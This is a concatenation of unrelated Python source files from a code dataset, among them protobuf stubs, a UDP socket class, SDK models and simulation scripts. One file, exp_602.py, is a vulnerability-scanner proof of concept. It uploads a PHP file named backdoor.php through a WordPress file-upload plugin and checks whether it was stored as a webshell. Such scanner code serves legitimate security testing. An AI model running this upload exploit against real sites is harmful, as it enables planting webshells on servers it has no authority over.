DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
path = ... # type: typing___Text
newName = ... # type: typing___Text
oldName = ... # type: typing___Text
def __init__(self,
*,
path : typing___Optional[typing___Text] = None,
newName : typing___Optional[typing___Text] = None,
oldName : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail.Items: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail.Items: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"newName",b"newName",u"oldName",b"oldName",u"path",b"path"]) -> None: ...
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
@property
def items(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail.Items]: ...
def __init__(self,
*,
items : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail.Items]] = None,
packageId : typing___Optional[typing___Text] = None,
installPath : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff.Detail: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff.Detail: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"installPath",b"installPath",u"items",b"items",u"packageId",b"packageId"]) -> None: ...
hosts = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]
@property
def detail(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff.Detail]: ...
def __init__(self,
*,
hosts : typing___Optional[typing___Iterable[typing___Text]] = None,
detail : typing___Optional[typing___Iterable[Task.ConfigDiff.Detail]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigDiff: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.ConfigDiff: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"detail",b"detail",u"hosts",b"hosts"]) -> None: ...
class Batches(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
def __init__(self,
*,
targets : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.Batches: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task.Batches: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
appId = ... # type: typing___Text
appName = ... # type: typing___Text
clusterId = ... # type: typing___Text
clusterType = ... # type: typing___Text
operator = ... # type: typing___Text
org = ... # type: builtin___int
taskTimeStamp = ... # type: typing___Text
configVersion = ... # type: typing___Text
configPackageId = ... # type: typing___Text
needNotify = ... # type: builtin___bool
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]: ...
@property
def configList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigList]: ...
@property
def labels(self) -> google___protobuf___struct_pb2___Struct: ...
@property
def configDiff(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.ConfigDiff]: ...
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[Task.Batches]: ...
def __init__(self,
*,
appId : typing___Optional[typing___Text] = None,
appName : typing___Optional[typing___Text] = None,
clusterId : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
operator : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
targetList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
packageList : typing___Optional[typing___Iterable[tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo]] = None,
configList : typing___Optional[typing___Iterable[Task.ConfigList]] = None,
taskTimeStamp : typing___Optional[typing___Text] = None,
configVersion : typing___Optional[typing___Text] = None,
configPackageId : typing___Optional[typing___Text] = None,
labels : typing___Optional[google___protobuf___struct_pb2___Struct] = None,
configDiff : typing___Optional[typing___Iterable[Task.ConfigDiff]] = None,
needNotify : typing___Optional[builtin___bool] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
batches : typing___Optional[typing___Iterable[Task.Batches]] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Task: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"labels",b"labels"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"appName",b"appName",u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"clusterId",b"clusterId",u"clusterType",b"clusterType",u"configDiff",b"configDiff",u"configList",b"configList",u"configPackageId",b"configPackageId",u"configVersion",b"configVersion",u"failedStop",b"failedStop",u"labels",b"labels",u"needNotify",b"needNotify",u"operator",b"operator",u"org",b"org",u"packageList",b"packageList",u"targetList",b"targetList",u"taskTimeStamp",b"taskTimeStamp"]) -> None: ...
| [
"[email protected]"
]
| |
6b7b060513cf603782ed5bf499c61bedf4ab8776 | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_602.py | 9d51ac6e5eea714832eab404bedc4db5c96a7b00 | []
| no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,189 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
| [
"[email protected]"
]
| |
fcbbaec32e58baf63051f622962e9ba754e5e366 | 908655251066427f654ee33ebdf804f9f302fcc3 | /Tests/Pedestrian/Pedestrian_AS.py | 6fca7c3c2b9f432c82c945dd4a51c48690014dc8 | []
| no_license | maxiaoba/MCTSPO | be567f80f1dcf5c35ac857a1e6690e1ac599a59d | eedfccb5a94e089bd925b58f3d65eef505378bbc | refs/heads/main | 2023-07-05T02:20:16.752650 | 2021-07-06T06:04:40 | 2021-07-06T06:04:40 | 381,811,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py | import mcts.AdaptiveStressTestingActionSpace as AST_AS
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math
np.random.seed(0)
max_path_length = 50
ec = 100.0
n = 160
top_k = 10
RNG_LENGTH = 2
SEED = 0
reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False,spaces=spaces,max_path_length=max_path_length)
env = ASTEnv(interactive=True,
sample_init_state=False,
s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],
simulator=sim,
reward_function=reward_function,
)
ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
macts_params = MCTSdpw.DPWParams(max_path_length,ec,n,0.5,0.85,1.0,0.0,True,1.0e308,np.uint64(0),top_k)
stress_test_num = 2
if stress_test_num == 2:
result = AST_MCTS.stress_test2(ast,macts_params,False)
else:
result = AST_MCTS.stress_test(ast,macts_params,False)
#reward, action_seq = result.rewards[1], result.action_seqs[1]
print("setp count: ",ast.step_count)
for (i,action_seq) in enumerate(result.action_seqs):
reward, _ = ASTSim.play_sequence(ast,action_seq,sleeptime=0.0)
print("predic reward: ",result.rewards[i])
print("actual reward: ",reward)
| [
"[email protected]"
]
| |
f66d367cd6e818d2f464c01786bf01dada756def | fae0230fae5f2e762e299785cbd66ebf7330d937 | /watchtower/_io.py | 9474a5b819d01bd7b9c93eb35a3e6ecabc9bf44c | []
| no_license | NelleV/watchtower | e4bb6c178cfaf9bf909018692662769153a64d2b | 39b5ab198ed03cf4e0b11aa766683b244125bd58 | refs/heads/master | 2022-10-09T18:32:36.344014 | 2022-09-28T10:02:10 | 2022-09-28T10:02:10 | 80,778,407 | 1 | 3 | null | 2017-04-10T18:32:18 | 2017-02-02T23:19:39 | Python | UTF-8 | Python | false | false | 651 | py | import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
| [
"[email protected]"
]
| |
c340f5ae35cb6ada1d2fe7cae70e4fcd2150d17a | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py | 95f1fd42aa48e0981658416011cf8039490df40a | []
| no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | -X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250
| [
"[email protected]"
]
| |
9ebb16b914fced04b98c5b6a064841ca987a4e17 | ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3 | /python/baiduads-sdk-auto/test/test_negative_word_packet.py | 2d84a0b0df973bbdbe590260f3d6719c3f2cf800 | [
"Apache-2.0"
]
| permissive | baidu/baiduads-sdk | 24c36b5cf3da9362ec5c8ecd417ff280421198ff | 176363de5e8a4e98aaca039e4300703c3964c1c7 | refs/heads/main | 2023-06-08T15:40:24.787863 | 2023-05-20T03:40:51 | 2023-05-20T03:40:51 | 446,718,177 | 16 | 11 | Apache-2.0 | 2023-06-02T05:19:40 | 2022-01-11T07:23:17 | Python | UTF-8 | Python | false | false | 688 | py | """
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
"""NegativeWordPacket unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNegativeWordPacket(self):
"""Test NegativeWordPacket"""
# FIXME: construct object with mandatory attributes with example values
# model = NegativeWordPacket() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
5979042ecef7aab7fc251af4efd1c0f05b6ca7eb | 9a28e0cecdf71cdb4eccdfc7df2554bd421fa69f | /src/hio/core/udp/udping.py | bff163c93346be5c63bb8cf904ea68b1a1ca4e35 | [
"Apache-2.0"
]
| permissive | cellofellow/hio | a1700f3c8abc8100926dc4fc0af87efc294f6917 | 1296d196543ad01829dcb86844dfd5881af5a038 | refs/heads/master | 2023-04-04T01:27:01.449465 | 2021-04-08T17:26:01 | 2021-04-08T17:26:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,837 | py | # -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
"""
Class to manage non blocking I/O on UDP socket.
"""
def __init__(self,
ha=None,
host='',
port=55000,
bufsize=1024,
wl=None,
bcast=False):
"""
Initialization method for instance.
ha = host address duple (host, port)
host = '' equivalant to any interface on host
port = socket port
bs = buffer size
path = path to log file directory
wl = WireLog instance ref for debug logging or over the wire tx and rx
bcast = Flag if True enables sending to broadcast addresses on socket
"""
self.ha = ha or (host, port) # ha = host address duple (host, port)
self.bs = bufsize
self.wl = wl
self.bcast = bcast
self.ss = None #server's socket needs to be opened
self.opened = False
def actualBufSizes(self):
"""
Returns duple of the the actual socket send and receive buffer size
(send, receive)
"""
if not self.ss:
return (0, 0)
return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
def open(self):
"""
Opens socket in non blocking mode.
if socket not closed properly, binding socket gets error
socket.error: (48, 'Address already in use')
"""
#create socket ss = server socket
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.bcast: # enable sending to broadcast addresses
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# make socket address reusable. doesn't seem to have an effect.
# the SO_REUSEADDR flag tells the kernel to reuse a local socket in
# TIME_WAIT state, without waiting for its natural timeout to expire.
# may want to look at SO_REUSEPORT
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
self.ss.setblocking(0) #non blocking socket
#bind to Host Address Port
try:
self.ss.bind(self.ha)
except socket.error as ex:
console.terse("socket.error = {0}\n".format(ex))
return False
self.ha = self.ss.getsockname() #get resolved ha after bind
self.opened = True
return True
def reopen(self):
"""
Idempotently open socket
"""
self.close()
return self.open()
def close(self):
"""
Closes socket and logs if any
"""
if self.ss:
self.ss.close() #close socket
self.ss = None
self.opened = False
def receive(self):
"""
Perform non blocking read on socket.
returns tuple of form (data, sa)
if no data then returns (b'',None)
but always returns a tuple with two elements
"""
try:
data, sa = self.ss.recvfrom(self.bs) # sa is source (host, port)
except socket.error as ex:
# ex.args[0] is always ex.errno for better compat
if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
return (b'', None) #receive has nothing empty string for data
else:
emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
console.profuse(emsg)
raise #re raise exception ex1
if console._verbosity >= console.Wordage.profuse: # faster to check
try:
load = data.decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data).decode("ASCII"))
cmsg = ("Server at {0}, received from {1}:\n------------\n"
"{2}\n\n".format(self.ha, sa, load))
console.profuse(cmsg)
if self.wl: # log over the wire rx
self.wl.writeRx(data, who=sa)
return (data, sa)
def send(self, data, da):
"""
Perform non blocking send on socket.
data is string in python2 and bytes in python3
da is destination address tuple (destHost, destPort)
"""
try:
result = self.ss.sendto(data, da) #result is number of bytes sent
except socket.error as ex:
emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
console.profuse(emsg)
result = 0
raise
if console._verbosity >= console.Wordage.profuse:
try:
load = data[:result].decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
"{3}\n\n".format(self.ha, result, da, load))
console.profuse(cmsg)
if self.wl:
self.wl.writeTx(data[:result], who=da)
return result
PeerUdp = SocketUdpNb # alias
| [
"[email protected]"
]
| |
3c52afe069397e41486a991fd1e98c2ef777447d | 3d989666e6ceb2abc9175dcf7b1d0c1f8c76d205 | /py_solution/p172_factorial_trailing_zeroes.py | 2e88229ace7c046a24203162ad16036725347fd1 | []
| no_license | dengshilong/leetcode | 00ae0898b4645efd1de69a13f2fa92606e899297 | 5ab258f04771db37a3beb3cb0c490a06183f7b51 | refs/heads/master | 2021-01-10T11:58:10.396399 | 2020-04-10T12:10:54 | 2020-04-10T12:10:54 | 47,912,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
solution = Solution()
assert solution.trailingZeroes(3) == 0
assert solution.trailingZeroes(5) == 1
assert solution.trailingZeroes(10) == 2
assert solution.trailingZeroes(25) == 6
| [
"[email protected]"
]
| |
76eeb3e354352d6dfd8a7b6d6e3e27b30af289a5 | 43eb7f8581a8dbfa1298b4e6d84fc7b7a552e335 | /python/kserve/kserve/models/v1beta1_inference_service_status.py | f509e6bb2db9b1958db1fd812b355ccd0c7546b0 | [
"Apache-2.0"
]
| permissive | Suresh-Nakkeran/kserve | c2d114f7258a70b4c8ddeb8ee8c584d4eee0f81b | d3910e0fc6af4bf73156a53bd912d6e4acc87533 | refs/heads/master | 2023-07-29T00:17:28.900100 | 2021-09-11T08:04:54 | 2021-09-11T08:04:54 | 406,243,335 | 0 | 0 | Apache-2.0 | 2021-09-14T05:59:05 | 2021-09-14T05:59:04 | null | UTF-8 | Python | false | false | 9,203 | py | # Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
KServe
Python SDK for KServe # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kserve.configuration import Configuration
class V1beta1InferenceServiceStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'address': 'KnativeAddressable',
'annotations': 'dict(str, str)',
'components': 'dict(str, V1beta1ComponentStatusSpec)',
'conditions': 'list[KnativeCondition]',
'observed_generation': 'int',
'url': 'KnativeURL'
}
attribute_map = {
'address': 'address',
'annotations': 'annotations',
'components': 'components',
'conditions': 'conditions',
'observed_generation': 'observedGeneration',
'url': 'url'
}
def __init__(self, address=None, annotations=None, components=None, conditions=None, observed_generation=None, url=None, local_vars_configuration=None): # noqa: E501
"""V1beta1InferenceServiceStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._address = None
self._annotations = None
self._components = None
self._conditions = None
self._observed_generation = None
self._url = None
self.discriminator = None
if address is not None:
self.address = address
if annotations is not None:
self.annotations = annotations
if components is not None:
self.components = components
if conditions is not None:
self.conditions = conditions
if observed_generation is not None:
self.observed_generation = observed_generation
if url is not None:
self.url = url
@property
def address(self):
"""Gets the address of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeAddressable
"""
return self._address
@address.setter
def address(self, address):
"""Sets the address of this V1beta1InferenceServiceStatus.
:param address: The address of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeAddressable
"""
self._address = address
@property
def annotations(self):
"""Gets the annotations of this V1beta1InferenceServiceStatus. # noqa: E501
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:return: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, str)
"""
return self._annotations
@annotations.setter
def annotations(self, annotations):
"""Sets the annotations of this V1beta1InferenceServiceStatus.
Annotations is additional Status fields for the Resource to save some additional State as well as convey more information to the user. This is roughly akin to Annotations on any k8s resource, just the reconciler conveying richer information outwards. # noqa: E501
:param annotations: The annotations of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, str)
"""
self._annotations = annotations
@property
def components(self):
"""Gets the components of this V1beta1InferenceServiceStatus. # noqa: E501
Statuses for the components of the InferenceService # noqa: E501
:return: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: dict(str, V1beta1ComponentStatusSpec)
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this V1beta1InferenceServiceStatus.
Statuses for the components of the InferenceService # noqa: E501
:param components: The components of this V1beta1InferenceServiceStatus. # noqa: E501
:type: dict(str, V1beta1ComponentStatusSpec)
"""
self._components = components
@property
def conditions(self):
"""Gets the conditions of this V1beta1InferenceServiceStatus. # noqa: E501
Conditions the latest available observations of a resource's current state. # noqa: E501
:return: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: list[KnativeCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1beta1InferenceServiceStatus.
Conditions the latest available observations of a resource's current state. # noqa: E501
:param conditions: The conditions of this V1beta1InferenceServiceStatus. # noqa: E501
:type: list[KnativeCondition]
"""
self._conditions = conditions
@property
def observed_generation(self):
"""Gets the observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:return: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1beta1InferenceServiceStatus.
ObservedGeneration is the 'Generation' of the Service that was last processed by the controller. # noqa: E501
:param observed_generation: The observed_generation of this V1beta1InferenceServiceStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def url(self):
"""Gets the url of this V1beta1InferenceServiceStatus. # noqa: E501
:return: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:rtype: KnativeURL
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this V1beta1InferenceServiceStatus.
:param url: The url of this V1beta1InferenceServiceStatus. # noqa: E501
:type: KnativeURL
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1InferenceServiceStatus):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
]
| |
2b7a2c90bae671eb7855d16bc122acb73d9dafdc | a16f3f148455395596405fd7b11df62932f3937d | /career/rabbit/send2.py | 8701013073a594d7af24fe5ebb5aa71253c6e7c5 | []
| no_license | wyzane/skill-general | 8eeb5984c42ec2bcb59c634c7f7bca7c2476977b | 6e5a498dd5b63117a6a20aa81ac67a1999d8ac21 | refs/heads/master | 2020-05-22T21:51:18.061659 | 2019-10-18T15:56:26 | 2019-10-18T15:56:26 | 186,535,789 | 0 | 0 | null | 2019-10-18T15:52:54 | 2019-05-14T03:12:39 | Python | UTF-8 | Python | false | false | 619 | py | import sys
import pika
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
durable=True) # 消息持久化,重启rabbitmq消息不会丢失
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
routing_key='task_queue',
body=message,
properties=pika.BasicProperties(
delivery_mode=2, # 使消息持久化
))
print("send message: ", message)
conn.close()
| [
"[email protected]"
]
| |
57fba70996c5020d941fdc5ac32be0f9eb38101e | e6acc3021714e47345213d13d6344e2d89d4a960 | /streamlit_analytics/__init__.py | 52fbbd335c80c4ce6d68b508bce9a1106a4d77f0 | [
"MIT"
]
| permissive | napoles-uach/streamlit-analytics | 157aa7521647dbe490c75af893361aa6e0ff613b | fe5a7855889a66cf8d6f3eabf8841f5c00e9b492 | refs/heads/main | 2023-03-01T20:42:58.361148 | 2021-01-29T23:32:28 | 2021-01-29T23:32:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | __version__ = "0.2.1"
from .main import track, start_tracking, stop_tracking, counts
| [
"[email protected]"
]
| |
a51fd66e325e13d07571a0145b88b73ff676b50b | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py | 698caaaa0fef8649ba108b232f7219fc181dd69a | [
"Apache-2.0"
]
| permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'job_id': 'str',
'selected': 'bool',
'sync_database': 'bool',
'job': 'list[DatabaseInfo]'
}
attribute_map = {
'job_id': 'job_id',
'selected': 'selected',
'sync_database': 'sync_database',
'job': 'job'
}
def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
"""UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
self._job_id = None
self._selected = None
self._sync_database = None
self._job = None
self.discriminator = None
self.job_id = job_id
if selected is not None:
self.selected = selected
if sync_database is not None:
self.sync_database = sync_database
if job is not None:
self.job = job
@property
def job_id(self):
"""Gets the job_id of this UpdateDatabaseObjectReq.
任务ID
:return: The job_id of this UpdateDatabaseObjectReq.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this UpdateDatabaseObjectReq.
任务ID
:param job_id: The job_id of this UpdateDatabaseObjectReq.
:type: str
"""
self._job_id = job_id
@property
def selected(self):
"""Gets the selected of this UpdateDatabaseObjectReq.
